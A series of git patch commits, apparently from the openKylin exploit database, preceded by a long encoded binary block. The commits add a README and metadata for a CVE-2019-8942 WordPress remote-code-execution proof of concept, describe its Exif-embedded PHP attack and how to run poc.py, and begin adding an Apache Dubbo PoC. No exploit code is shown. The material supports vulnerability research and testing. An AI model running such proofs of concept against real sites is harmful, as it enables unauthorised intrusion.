zqW?V7|3?$B_%1PVvH&{B1A`XAU99^cB-ro{4}}Ggf_jjo6c1Z^wU*z&K8GDv9WSrz zGULPhVy9oI51{NImFewyjjo#>WbA$g$s3mv2j@RgznG(c^_t1GJ~vxW>}#p&&uJ<@ zuX`nb&T!JY@Z*9n8!Md7VL{d(?8*~v6(W^(dOVAXsI&3*!mAH-`-QIEx~<90Ro@zk ze_RY%XiXBEXrx>Vt|c;OO4=hj>8Cu9TDcEeT5>N6ij#Hy5$pghH$Ogl`wzZzB!n`Z zDH7s_cXxJ*x?z@PS_KTT?wC?c?&}3n45?PlFB%OrlJ?%5Jd6yv$WO6=zP=)Ei58;; zY>wFMSt5(~lZNPylZ44wwYOOAb$nK=_e{W#k|4#6-tlGM&BJQUng*S1X3-dXjNYBc zUY9UT8Ay^ex#vd}%u=y0rfXgqV(mhc?t8?(?S>!UWI}Cga#`w&zbLF{Is$am{zfsy zt|njav*J3OTr;H#;B3=Y_v1;fG1TwF*1^h}?-?i^rP#Z>n87Omy;R|EF0Dw> zBxO^OY~Ee_7A?HaEeahh3%Nkgph*V9x+dmTNg6SsPLC*?dz-S8cjLa8yJhO2WihL7 z_m@fa3sBw0V=E!s`-#@X{k59$XCP}(`3;t`dh(z>zGx6hbs>58 z)PlYtgC}#8>DHTyt2|{h{gP*R^$Cuhy@^5VGb?$Z+~npk#gytuD{GY^Ef7<>?Q;Bd zCLG6@8%#e=UlSwNO)LKyRe#Fwi|OWI3vfL$yidDS~%%H4_*k~ZCF znr9tU(x*{QoO%~H=pxj6BTK_58IS`W!gQPi=h@+-40-cHD5+eK`&-On?eV6du`zBX(~?bCGV{^HrvTG` zYwt_Lp?c%LN62onW}igaDcOozhZgfJqDD z*1NxjML53(^YAGBbMEetf9H%4^>@~+Bu19P(6c{Ixlt+4ZvF%L>D`6~%R78}=>DNs zrxd{gcAd$jgOQI3>+&D@OEEt=aytTKcV4rJZu!*vpb=VtZH3q}Lwvofir z@%@M=_~kW1u`RL2k=e<3-ln$pZpp1bkd%I-`*d(J->bK0x1395RtWh`|9Oh;`Y}1N zi@QkA6a-JeE*o#Q3p)18H{6RD!Ati~$i$%v5Zm1J_xLi<6y_6aVn{;~?NKK)EVS@~{&^DCzk6m}3f}0X7(#E=4TBSd5A!4-ED?%%3l`BK;4g~S zx#vpV&0QuEk}yY8$&rqlh9Ol2qBXaIy=9=P$L|GXoo=VJ;R~R>SU`2Z-7S-kZVQS( zH#rKYZduXd%kCU>m8L%)M~&@Y*+74NHc(a&R(szAoX{ck&yYo4FgX$Y`oxi&YNd_vh)?$zcI0(dIkv5jGhfZoDmKq48I+MY4#+R$A` z%EUZ7ZXRwF6n7#!LwIvmSA9tVDZ#uCSH~#Pa2>ED;_8=e*e}YM+c$OV7Bbga%g?;o zJzYmen?yq8dCPgD(V%E~C4~->O|kyi4wIeoO%)5qD>xjPHGNmd{F#RcO=Py&yE)0r zZh$<(rJSZ3A|nM!(PAzY#f^ zb{5hvSKSkx^(<6eyb>!4G<3?aQs>_;LdDnXU3HR+F9&D@;!g>59^uz?KFEehTb$s{ zW{(1UqK?bhfS22#@tulx>PXn?CF2vec=I0!-IgEUI%7X?iR=7bqk89|gRcVnv?0eZ zLaa>*owMlK4HLpR((b+ZVPIX_AF1j!oz12o@Fl)+TFOiA#*V!!0|XgjuhEabB>e-~ z==P_~1$5k;Y?HqMJ!a_w$x;ntuSu&?2zkD5b3tG)o0Cm~4o=#!5zOBFyv=L0FrLb& zj>OIpZfoh)q%G+e>1Hv+O zm34g;2Pi_je!_*BeV&4$6KLj-vR_d0y8O9^0l(+7kWVjKowWQ-3QL;&_T#TOcw7_# zjH3+{JWtf{1rbU=G!a7MZz~&UcOMkDa?X^@&F07&(NlTw<|)fx{JT3uT+;4Ku!uhk 
zabLSoJRauwjF#3iX5JwH*|Ivry6!o)9gTs#r(dLMBpR?5o~y@^D^E|F)oJXfInq=u zaFL}d)LziHO0~01CDdiaRLoERZPMu6fh)F#@gE;fim$!eeiK2IIDaHtv#S4>XCv-d z3#t&KO@$?aO4;OB{!!xJKZYV(hHBWzl$7i!)u(c|GbeTMo z)E}T!(vAph&3`Akf-v~rWXKIY#?0J|?}YJn=GU{X*@#~SyLc@4Xiw4I>RYIZnQccG z+>IL^-QI~(7%TMWdgknF9J_dThfA`PMQ=NJ+XJi$>{#HGMi+LveuiR`cThGg_qI z(T%CLNd_zw^QB0It|s^4EX=32-ZLYT#)ob-sQYnKq{%-QX`bYgcG?@X1vUx=6{MHjZ*U0qm6C!=-+uFi%js zak-QTJ=wq8J3IYuSq&9WcoX{MyXl6P%i3jLgXON7QC16j_WpsesOHfe-+6HXksezH3XYCT#gSHjmvV z!EAK|qm~9BUeTBJe6B)6{xk3iKr+FIE(p8GH-w+N#2>QXmy4DojzDpwK#I%tdlO7a zQ?Wn3QsuLY&&lUmljSAD>Br&470LOton7r126zwp0FH24^IkEPSrYCCV$JP>3dy?`(Xs}8Hzds)P%4e9 zoR(4n8RtKJZ}YCHrI}@79Qe|UTr*lJ8Umh4i-sPQE#{X0nWHwY7Sc1b*^%o9T#R_o zwJHs&UI7&(8Tko$pTY>vv!h+4o5LewKf67MsuWhXRJY*~mtz0J9Swa~`mQB!uN+u^ zA2p0%!MM;|f8Sx>dhPS=4%I5*xa(uWsoIF}BZDi)hJ}|*vvsN8I4C%}a08``?#TFL z5FG4}{`0F%^cjL@n#1}%qM9$KbQgA4S6+r3A2|g6Kx-fro=T1DB?xWV-5E&JalSm+l$d+1IO{Q5PjD4&^wy*(1Q zP8Hh2P&K~z8oRafSX?UI$opy(p>)n&r^|F<2dE+HnpR{LOV)GHWHVQW1 zP8%<2#Lm4;(4(!9^5lkFePN`pTHR-FB7CT{`}d90?Og@xJOv7;b<+t+POIQlLG;jJ6RTB98l?6BF=c{EmuVjBuAt6XPusVAz2UE?8 zYTF}`YC^V6Y7pr49(L}%T~2*cuj}O)+NF9q+XeO8!67}W8)FCflQq(?(9rD!nG0jx zTZt4EotoxMp4M}*)v`A)_hpETR)saGgcU$LMgWD8O?$AJ9_d9|U-xLqG7zBTS}Syo zGHK7mQhimbQXby9k+bjoH&C;5mX!HZW@3$aK$M(ON&2X^CFkP(OaZJgya|q=N{>yz zbI5iRM&;FmWbN|`y57VFE4qtC(>r~lsvTcSwP*6nfz?fWa zhYv4FT?pK$qvdq5J8KdF1&5ZLSSZi?mdDilF-NiMNpb?R5QaVeIU>MzD!c>q`0dBZ zeXh@+Gy)Re8VDZ^u{z?%-h)_vUOH z71}kz&;aD#4oe2jVCVX4fIRi+g6_U_yZ+vImo8XDKqcNQW=0=<+J5UMTI36<$>Y44v zrp;_pD4+K1%@(1Xxj%~vkEW-nFQMKMl;9va-vI+9jPT~BA530P7rMzeR;{d=ie$fX z!{~Efl&r@gBuGKe@~fTXM^`z127bW-N`4y;X&#)88Yy8+!EyP^+g_B^?FctYt9sq6L<3SBUE z2a5Ws-aeN{K zI1OSYu%wR*HPFtN7L`%bRv+l*6HhgJ`Cs!)PZcJx3c6p3CdHcHDSRpwHjJdMw8F@q z8)VwzV(8a17!}|e#r9aYL7QP~L$%MRblNM6utTrR658hi{?0udqc%zxMy3`7^_JM@w5BefoxZoGj99YqH+=OQ?lZMq)m~)xqhY6Q zKhLNKo;d?Q(7eobp50drKelibIQIn$H8|%*8ev6;+kUIPsE$w`{_=%ALCik8ms|hY zspK^m{~N_I=8tw9&c)5N9an)=KZIfJkzq42=KRSDltF z>V8hf@BWzhUlLx1vp#;CAi(|{_o;^Y4J7eFL^b76vmHH=ov*#KOX5!OS 
zZtlaZy{C+3cM+r7VJ8>KUq1%%m<6aDmbsW_7WP+ez^21x<$0SKF_%9LLWA!>5*^Zf?hy~+} zu8lhl5kA2-abykRI+^IvFtvl1zB8(fPBls&7HEom59#_8Ga@JdRN2XcgTgF5aLf;P`Kk6&cj-UDHrwmD-9i^;TFqdafQe9C!rS z@4@o6IFtYj;NhKI$H(gaed!M>aKrcPpm+~wA2~Nhc_8FJ{NM}|C$Leh1LNaVNKTuw z;SVW{W4h6pz_3lNgSNbTcvPg^8Q+NVD`kDFtEY|c%+@SVQ`sSy&clD}vwuKEMdbr1 z(W+f&P0&azy~TuFmwx+sbb(fVz`)Do*{`&|!dI$B#gXMCETCw+;lH>$oJHI2tQUmn z_I?z9kX;lV-1JM%vFFhTxp{&-{4BQP3>HavoNap_Nn%+{KdsgrNLNy7^_{gjzEPw$ zY+x zYVlvbvb-_yD#`iFRXz|UhwZqExP?dza_3|!5K{1)(I-1Qp9#*@P9r+>+3FE#?+7d^ zWmMZQnJEat6*OELqf0YOkxylK|0J4puXL=<+v#vL7C^z4+#d_5jP$@#9P^@t0j1)G z&UEg`QH#>z-q#hgrr{ccXIN0x#kN}=SuRm7!INYhKN{KX0jH^zB($g%-o3EbTt2cq z<3harXLhzP#75ZX6Dd2A<#gKwAO|*t(Tt)f*&9ZYG|Sa10IE=sC-S2)Vcf^AImQa@ zd2^8lI6|Upt?n?RMY;d0E10S!dUPOYOqeUV_ zNXpME{N>ia;3Wa10!U@px;a8`U`j9;u5|iio(Bh&ud{H3^;7EgajKn5qQ3h{$#?0| zYreOAT}0c!eH8nOxsXaNG;afoKOgcf232-x8A+@xryrcE!Jjql+?wqx+2+4x^x11# z94ikO1NAQ09w_W5mY2?6-1ZiaPS`}L$zBcO>i3t54(mx0pZgT=;A_AQIap_MAr7@} z(7k}a&~Eof9hvcP@qU@&l?&2&7jUP)pVE){dXIN0z5U^}a$a+ly;b)~txVoK`H9H} zmr6TIem%0TXqcS5Uq7`;O6Td9lNl&0%K51>Oz;hy-v5HFfpyFYkrDCSvyt)EJtd`o zd4%(G*JD<1=!vfxIl0qLZyxanVS ztDgv7(AsKATOCY~Q=fhc#yfI=KHQgA83k?U(Y+J~J;b<8cHGrUPo7(5eh896JU!Fl zlb|=AH69x=nLqm9!w*Fc@!+cX!Ki!7D2|ebCeG`RUuTM%#ceuhNLYj%4CRvrcUb#_ zEQ?yBLh$WRm6^g$Ce%Na<7sWez>FD?3_@!jU>kku?TyrO$v)`U^jPjEXrJ4vX=&U| zH7ZBA*jV=u_of+{^mB*qbPc%7Gi2nsZlc1A`{YV*hf_CSM9=XS9ho<7w%1`%cDQj= zrIrbyUj`x;ZR6ouKiXvIm#MoG$rNe9`+*U+gN`oUJHmO>vPtvFz?x-sb#*qU!v4&j z3Zs?|J#`_7ab4ghleM0@*`4{9rfOsh=V2^c1VZ? 
z$*Buln@JaWN#gjT_;CjoACj5;Mltj3hq3q5MQ#MC))mgDUe#MXa0HKEuupO7^w+|iH zLcr9JQ4jQea`Dr{&7Gbgb#0yNPxCiE$fX_mbi@IAK8z(XHR>C#cE87y7~U-hhMS5S zTt7u|t9h+&S$|Yo-`erK3Y++eAc%T*(arM4nIm9&k0v7)t`Ifhy5!oDbpwqgFBc^q z8gc!Kc3OEV`H1S!;##KLEtokXNO^W>zf zL3hbab`Xc}i@mB0cu}m4hw9RnY5Sl|J4-wS`WURK zMPPq&?J;ma@B?!M3)$TU%9r{4DTrg!Acua!{yY>FK%zZ(q!q_7msk4p@G)x-fm8vj z@4_AnZ3K%BBEdCBH&IKnYF>#D8<=C)nqFOBpus21uQ{#opdiTL$;jW<{~aspbf0Rq zsE{57q1$|GQvr_9WPjA^XPz-rRO1^rMm^(lY6+3Ot#=}A*|LgP5A^#Ucr$Qq`hd{h z6TqzqV-H}Xa$N3mEzc3p#lc^P6+EmTgOam&_@{3Bgbp<2`~_hec5r-+#aLGiePDhE z;VJ_}+u!{;pwp-(^JU!r8>U#V)7tH8`-F*G;m_T`#$;-6ua%a#kxo;?n3ZttYH+VD zpPM+|Kb66npH3Es6p_1F!l&VkxZ9#|6a7f-sLR&lsei3%N8RK zxR3Q70TeYlL4wDuhB}YeE=ho&HW4`9#FkCbr=+;Nul7Bk#T~n%c_oV+Gg~Gf$iZmE zlAhHs91949p8=1~+r^2=r+i;JQ>$}hXY3Smv_I%MzaN=TBg+qyuEhv4&1Z=~UI$zb zOn_au{w++Fx~THxS0gU1wtO%ylt2RPZTZgQc7z=;u8xR&=@ z<($9f;2z5IVu9%C3HRz;_x3;s#fY;7P`CF@@=3R{L~;|jtNOIo6py62iYBwAYF*Gy z3sLI3-C$_8nDQTs1T#uoWOBg zPnqK2o>OG~^@u*rXhD!Z?3inFL+pp0rr1%Z z6WW+{Y94933zrdfuAa*Ag}^nBJoqv2g7>N-7n@=9_d(e&CSs}u%}+E3&SkSey2c(X zh=5s0_7c7?kROoXR^GmBBFOQ%xveo5tRLaN0WH}!$bBa!*Y+XbuZ8NoSkEq|Ml5lg z;+c%f4Rw30a`IP|pp=X8Vk|4WrY3c(kgZJV!#@yj7@)8aP4Hoy24Tx;S0In#u-rB{ z=Qnto2hzD3JLG)iL;rOpmL>5%6S(ufX9i9>N|HH@;}3-8EIKUeGwmlSx}U8prPZc{q_*-xYBETe%XuyO>}_8h14)IFxtV zf^C4dT6S?D`0yH$h*s%N82N$~6675$Hi$=Qn_m0Vn$swcqntUbsW{A=lC}$+vrX`? 
zT(L@h=%M6&^XJcQ7iXzh&Yzb+ZmpLx*?~{+l*YhxV?aeSytnIu*6=CkkHU$uS2+c{ zm7mbeSCj zJhfEiklv`ZFm1);-ljpx6{2r=81GayFyUmtFhwnd!*jFTo+nyf{qkH|>GHJv-xv92 zWaO?VX?v5Eid@`F3f+F}d8`&EU?jouIhHHTofvB_6WSc3>Y^OnY8srCH3Y$G!)2+f zNf^0GcObC)5r5&kwF&65yYpR9JnDV`z=7-`X}&rZWVr4@pyKyt7-em|Ze}HDo<+~3 z6Ju|aZ>HLgOKYo`-@5)J%P6E;-U#>CS9o%Vi>6O1`C^+caq~M|nSSA$!L>lCKq!7G<-IKHNpWYp2X41Pe)Y-5u0K^-3@gU;!W;%I!z!d@G$QaWX5c71u+ zU~i;lhvj!K2!NC7V6{=tZzgslpmdhX4vF|IN_}(f=coIp9&bc5eXWOm zWTT%gb1tXn6bqd%iy1nMZf0`E(@gs^flF{bz{yz}93ppS(m{CNemM<1(qKm$KO1oOf2404RCp0eEY3f-JEh_a1x_|>TFJ_UXE2W&H?A^I=f}bN zT(GV?SWd7LglbP0CSYZvzJ-Zqh>2I$rn7IcY6R6-X`$gO=XSs>kIWP-tW6t(YSzVy zv?&0oUF}x_fYy3JHO>(<6I#64pAq-<-*Gr5T8uP$v@l zL!)5Jl$&Cw2>g=!6-6H{6XityvLAxVk&equ5N_l{BnE69|Kh2AWfY=mEZCd)m|0H+OLQ?i-zkdu$#V`4Qm?xrerf zn%@0Niu4j+UvCf`T*?{$pHt2jt{S@;L$lhmpp{P2#e=lfjvN>>XQ<2L#i&rRUU4?o zUD~Pck3YtDkgcEAB#>2og55d4 z--PuQXH~VIRc^mesN>i$p`P2T7^5#p-wAvV&U3-<5$)KA1KbM6Qdcg=mz$8BWvlx#4ImW=0E zQnd$cyr71P+q8IFpMy^N1Qq$YH>6fEb^XsQQBgxux=@WX$OXvI76v!qzk%m$^^EsX zTsLmq^$`8`5_~O279qS89X9udCR~4fsH#8Lt?@T~{MwIh3|9U=(Pq>#+ek~@Avea+ zl;ern)l2v_SO@$f)wb*P5ts-DP7BDQT$CZ@W*l0zWUL5wmTg@&^m=3e8_LGL)TY85 z!m_~i%rxj~o{yPQG`_E&IQi&%-ugS2M(wsP)|}XL0xdI2)a|`RMrE7miMTH?8H}CU zgm!{H%7z?je$wRUr|z)oqFan_Dzg}HqqC~ba zJV?XM^&%d#o{`zoF#Y${8ZuX~q&jTfdDw4Rj52JWdmQ`sLL*EB{1Kq27!WrruoroofOW(I2S+BxBwpPhcRu>!Y1(^1&-1C7o=76AKYLbK}O&C#8o zC_zV7mRF{Q5x0Ps3iHv3lLRn?9gyqo#!C+&DNrJhlPAj^`9zfZck`{#)Te)K^yc_J zE8BkUp0gyslSb|alJM=G;Al}Z`S=#q>5C_a%g->Wi(N@Pv-AD^e-vI<|8Dpi{P{`2 z=G8I?h=mHYDbe)+6Y?(uCz^f_5s~nqbe|>ogS+ZUM{YNtyEeb1qJxrnWZEZJ@-~gY zr=Fvp_eOw`TWe}MXgsezQJHw9Y7Xg3+Wjl;5zJV=113TrV)x1z)$n7?{x(t2&rtuq zDKS~S@@o?!;oh=mgJ-s7xlG#?{oIBtix3rdev&L*mGK^X7movh>}tt|;NjI_cw%Ral(~kke|4 zKt7igo6VNxEn)l3S+Szu>rX}UtxL1LH(_w z6>NK;`qjbYq|6cU`A^XWe~|2fENWqojAZje9dJ;tMn>9AI~@+mY4O8jb@091imdzp zKup0e7ce^y`r^%cvTkV=_^QnD*rj^y_#MJQ4lmNX8EHH7a?h~!u`P5{h!lUFh_dz$ zJY1$?Etw&u1<;>(M@B2i^Q4QOQ(N8SAu9>-V@MNJR1yMh&%7d>Nlu5zsFcHsfF)x;Anl~GX4v2nZ$nK87V9Ll+A 
zY=^Bwa=d7b%8`Ztpn)<^KyhKypVp|Z#c-osX_FZJs3~bdZIZqqSZrCXRn|i>zG-7; z;bL2i8T#)K*8hB;$AdN&-~|{h;aG2AMxE?ASWVD2U_-uEKCtr3Vm&%_$T|OlRdM?I zti+){*^e%Y*vqE|$Bt0cv&cA@i+ue1e9GkE1;%7`MLiI2xO?X8K0Z#d06MjO6x)G< zbKcdti@{PedzwVnb$B1y*EhZ5zIY{rs=JiC-lRbn3Ez|ZfqE9Po&4xc#)hU>D|HjR z)|Ip7ge-iACHPnlnP7AhH+J;?KafE`@E}~W?41Prr3&mPc;>yaUtkzSXnOFtpllU& zcTGQn)gTzZf~5MUKo|+M2D<1XX%81rLIxXHF=T^e)q2I8n}2Z3i1O&m*oYu|r$K@+ zc&#c#ooxo&ga@Z5Kl*5QQJ~t+j6itAa#nh#_VA88_Mu$b>U$M(lOpT=9*+yOhAwv$ z-D(lk;;ws~`cY((j;}-h4Omqqgkt)|>PO!k4bpd%{*Pd^e_aay|MUNT4> Date: Fri, 7 Apr 2023 12:38:10 +0000 Subject: [PATCH 026/109] add cve/WordPress/2019/CVE-2019-8942/README.md. Signed-off-by: bbj --- cve/WordPress/2019/CVE-2019-8942/README.md | 29 ++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cve/WordPress/2019/CVE-2019-8942/README.md diff --git a/cve/WordPress/2019/CVE-2019-8942/README.md b/cve/WordPress/2019/CVE-2019-8942/README.md new file mode 100644 index 00000000..c248bbac --- /dev/null +++ b/cve/WordPress/2019/CVE-2019-8942/README.md @@ -0,0 +1,29 @@ +# CVE-2019-8942 Proof-of-Concept + +### Overview + +WordPress before 4.9.9 and 5.x before 5.0.1 allows remote code execution because an _wp_attached_file Post Meta entry can be changed to an arbitrary string, such as one ending with a .jpg?file.php substring. An attacker with author privileges can execute arbitrary code by uploading a crafted image containing PHP code in the Exif metadata. Exploitation can leverage CVE-2019-8943. +For a comprehensive understanding, check out the accompanying [blog post](http://blog.nsfocus.net/wordpress-5-0-0-rce/) for in-depth details. + +### Dependencies + +* python3 +* requests package + +### Usage + +1. Verify requests is installed: +``` +sudo pip3 install requests +``` + +2. Modify the url_root in poc.py as you wish: +for example: +``` +url_root = 'http://localhost/' +``` + +3. Run the PoC: +``` +python3 ./poc.py +``` \ No newline at end of file 
From c0acd0e447225a71dd2fdcaced96deebcfe6d273 Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:38:40 +0000 Subject: [PATCH 027/109] update cve/WordPress/2019/CVE-2019-8942/README.md. Signed-off-by: bbj --- cve/WordPress/2019/CVE-2019-8942/README.md | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cve/WordPress/2019/CVE-2019-8942/README.md b/cve/WordPress/2019/CVE-2019-8942/README.md index c248bbac..00668b78 100644 --- a/cve/WordPress/2019/CVE-2019-8942/README.md +++ b/cve/WordPress/2019/CVE-2019-8942/README.md @@ -17,8 +17,7 @@ For a comprehensive understanding, check out the accompanying [blog post](http:/ sudo pip3 install requests ``` -2. Modify the url_root in poc.py as you wish: -for example: +2. Modify the url_root in poc.py as you wish, for example:: ``` url_root = 'http://localhost/' ``` From 729d3ce610623b1dbfa2eaa3a3285fefff46d9df Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:40:07 +0000 Subject: [PATCH 028/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/WordPress/2019/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/WordPress/2019/yaml/.keep diff --git a/cve/WordPress/2019/yaml/.keep b/cve/WordPress/2019/yaml/.keep new file mode 100644 index 00000000..e69de29b From 4d3e5ddfa2acb5e42781b87c119af56e93321243 Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:56:07 +0000 Subject: [PATCH 029/109] rename cve/WordPress/2019/yaml/.keep to cve/WordPress/2019/yaml/CVE-2019-8942.yaml. Signed-off-by: bbj --- cve/WordPress/2019/yaml/.keep | 0 cve/WordPress/2019/yaml/CVE-2019-8942.yaml | 21 +++++++++++++++++++++ 2 files changed, 21 insertions(+) delete mode 100644 cve/WordPress/2019/yaml/.keep create mode 100644 cve/WordPress/2019/yaml/CVE-2019-8942.yaml diff --git a/cve/WordPress/2019/yaml/.keep b/cve/WordPress/2019/yaml/.keep deleted file mode 100644 index e69de29b..00000000 
diff --git a/cve/WordPress/2019/yaml/CVE-2019-8942.yaml b/cve/WordPress/2019/yaml/CVE-2019-8942.yaml new file mode 100644 index 00000000..b2d43e43 --- /dev/null +++ b/cve/WordPress/2019/yaml/CVE-2019-8942.yaml @@ -0,0 +1,21 @@ +id: CVE-2019-8942 +source: + https://github.com/synacktiv/CVE-2019-8942 +info: + name: WordPress是一款免费开源的内容管理系统(CMS),目前已经成为全球使用最多的CMS建站程序。 + severity: high + description: | + WordPress before 4.9.9 and 5.x before 5.0.1 allows remote code execution because an _wp_attached_file Post Meta entry can be changed to an arbitrary string, such as one ending with a .jpg?file.php substring. An attacker with author privileges can execute arbitrary code by uploading a crafted image containing PHP code in the Exif metadata. Exploitation can leverage CVE-2019-8943. + scope-of-influence: + WordPress < 4.9.9 + WordPress 5.x < 5.0.1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-8942 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2019-8942 + cwe-id: CWE-434 + cnvd-id: None + kve-id: None + tags: RCE,远程代码执行 \ No newline at end of file From b84ae70bb0b392562f6531d7090c47585bef7967 Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:56:28 +0000 Subject: [PATCH 030/109] update cve/WordPress/2019/yaml/CVE-2019-8942.yaml. Signed-off-by: bbj --- cve/WordPress/2019/yaml/CVE-2019-8942.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/WordPress/2019/yaml/CVE-2019-8942.yaml b/cve/WordPress/2019/yaml/CVE-2019-8942.yaml index b2d43e43..4223ef65 100644 --- a/cve/WordPress/2019/yaml/CVE-2019-8942.yaml +++ b/cve/WordPress/2019/yaml/CVE-2019-8942.yaml @@ -18,4 +18,4 @@ info: cwe-id: CWE-434 cnvd-id: None kve-id: None - tags: RCE,远程代码执行 \ No newline at end of file + tags: RCE, 远程代码执行 \ No newline at end of file From 56752fa5c04d8af0ebcb993af5f94eb959302867 Mon Sep 17 00:00:00 2001 
From: bbj Date: Fri, 7 Apr 2023 12:58:19 +0000 Subject: [PATCH 031/109] update other_list.yaml. Signed-off-by: bbj --- other_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/other_list.yaml b/other_list.yaml index d3ae8268..5e9b12b0 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -54,5 +54,7 @@ cve: - CVE-2022-2555 Zyxel: - CVE-2022-30525 + WordPress: + - CVE-2019-8942 cnvd: From 4fb3f61e62af9d435f56abb8d8e2bd566b24c91f Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 13:03:08 +0000 Subject: [PATCH 032/109] update cve/WordPress/2019/CVE-2019-8942/README.md. Signed-off-by: bbj --- cve/WordPress/2019/CVE-2019-8942/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cve/WordPress/2019/CVE-2019-8942/README.md b/cve/WordPress/2019/CVE-2019-8942/README.md index 00668b78..812c6782 100644 --- a/cve/WordPress/2019/CVE-2019-8942/README.md +++ b/cve/WordPress/2019/CVE-2019-8942/README.md @@ -12,12 +12,12 @@ For a comprehensive understanding, check out the accompanying [blog post](http:/ ### Usage -1. Verify requests is installed: +1. Verify if requests is installed: ``` sudo pip3 install requests ``` -2. Modify the url_root in poc.py as you wish, for example:: +2. Modify the "url_root" in poc.py as you wish, for example: ``` url_root = 'http://localhost/' ``` From a78c22a48dab7dd4dff1866261b03489625207ff Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=B4=94=E8=8E=B9?= Date: Fri, 7 Apr 2023 13:12:41 +0000 Subject: [PATCH 033/109] update README.md. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 崔莹 --- README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 7c9db687..0f2cd172 100644 --- a/README.md +++ b/README.md 
@@ -33,12 +33,12 @@ git clone https://gitee.com/openkylin/openkylin-exploit-db.git 4. 新建 Pull Request 由于未公开漏洞危险性,我们将严格按照[openKylin安全漏洞信息披露政策]()对漏洞进行处理披露。同时我们采取以下措施来对贡献者贡献的漏洞信息进行处理。 -1. 我们对所有来自贡献者提交的Pull Request开启了代码评审功能,开启的代码评审(Pull Request),仅管理员、审查者、测试者可见,保证了当前Pull Request信息的安全。 +1. 我们对所有来自贡献者提交的Pull Request开启了代码评审功能,开启的代码评审(Pull Request),仅管理员、审查者、测试者可见,保证了当前Pull Request信息的安全。 2. 当贡献者提交issue时,打开了内容风险标识选项后,当前提交的issue非项目成员均无法查看,保证了当前提交的issue信息的安全。 同时我们也建议贡献者通过以下渠道向社区贡献未公开漏洞: 1. Psirt邮箱 -psirt@lists.openkylin.top,您可以通过E-mail将openKylin相关的安全漏洞情报、信息反馈给openKylin安全团队,由于内容比较敏感,建议您使用公钥对邮件信息进行加密,[公钥下载链接](https://kylinos.cn/upload/psirt_kylinos_pub.asc)。 +psirt@lists.openkylin.top,您可以通过E-mail将openKylin相关的安全漏洞情报、信息反馈给openKylin安全团队,由于内容比较敏感,建议您使用公钥对邮件信息进行加密,[公钥下载链接](https://kylinos.cn/upload/psirt_kylinos_pub.asc)。 如果想要项目提供暂时未有的公开漏洞的验证程序,也可通过新建[issue](https://gitee.com/openkylin/openkylin-exploit-db/issues/new)。 
@@ -47,11 +47,11 @@ psirt@lists.openkylin.top,您可以通过E-mail将openKylin相关的安全漏 ### 贡献说明 1. 提交漏洞验证程序目录结构:漏洞编号类型(cve、cnvd)/软件/漏洞年份/漏洞编号。 -2. 提交漏洞验证程序需要提供漏洞CVE-xxxx-xxx.yaml文件,项目根目录下提供漏洞模版.yaml,内容包括但不限于:漏洞编号、漏洞等级、漏洞简介、漏洞类型、漏洞检测程序来源、补丁链接。 +2. 提交漏洞验证程序需要提供漏洞CVE-xxxx-xxx.yaml文件,项目根目录下提供漏洞模版.yaml,内容包括但不限于:漏洞编号、漏洞等级、漏洞简介、漏洞类型、漏洞检测程序来源、补丁链接。 3. 提交漏洞验证程序需要补充项目根目录中openkylin_list.yaml或other_list.yaml文件。 4. 漏洞README.md文件,需要有漏洞验证程序的详细使用方法。 -注:贡献漏洞验证程序如在openKylin发行版上测试有效添加至[openkylin_list.yaml](https://gitee.com/openkylin/openkylin-exploit-db/blob/master/openkylin_list.yaml)列表中,相反添加至[other_list.yaml](https://gitee.com/openkylin/openkylin-exploit-db/blob/master/other_list.yaml)列表中,openKylin发行版下载[地址](https://www.openkylin.top/downloads/)。 +注:贡献漏洞验证程序如在openKylin发行版上测试有效添加至[openkylin_list.yaml](https://gitee.com/openkylin/openkylin-exploit-db/blob/master/openkylin_list.yaml)列表中,相反添加至[other_list.yaml](https://gitee.com/openkylin/openkylin-exploit-db/blob/master/other_list.yaml)列表中,openKylin发行版下载[地址](https://www.openkylin.top/downloads/)。 ### 免责声明 为本项目为[openKylin SecurityGovernance SIG组](https://gitee.com/openkylin/securitygovernance-management)主导建立的漏洞验证程序仓库,仓库内容不代表本项目团队和openKylin社区的立场及观点。由于传播、利用此项目中的一切内容而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本项目团队和openKylin社区不为此承担任何责任。 From 7b268e33cd5a6511fd137e0aac69345cf52e7abd Mon Sep 17 00:00:00 2001 
From: zeroc Date: Mon, 10 Apr 2023 10:36:15 +0800 Subject: [PATCH 034/109] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2023-23638?= =?UTF-8?q?=E6=BC=8F=E6=B4=9EPOC?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2023/CVE-2023-23638/README.md | 7 + .../2023/CVE-2023-23638/poc/DemoConsumer.java | 51 ++++++++ .../2023/CVE-2023-23638/poc/DemoProvider.java | 18 +++ cve/apache-Dubbo/2023/CVE-2023-23638/pom.xml | 121 ++++++++++++++++++ .../2023/yaml/CVE-2023-23638.yaml | 22 ++++ openkylin_list.yaml | 1 + 6 files changed, 220 insertions(+) create mode 100644 cve/apache-Dubbo/2023/CVE-2023-23638/README.md create mode 100644 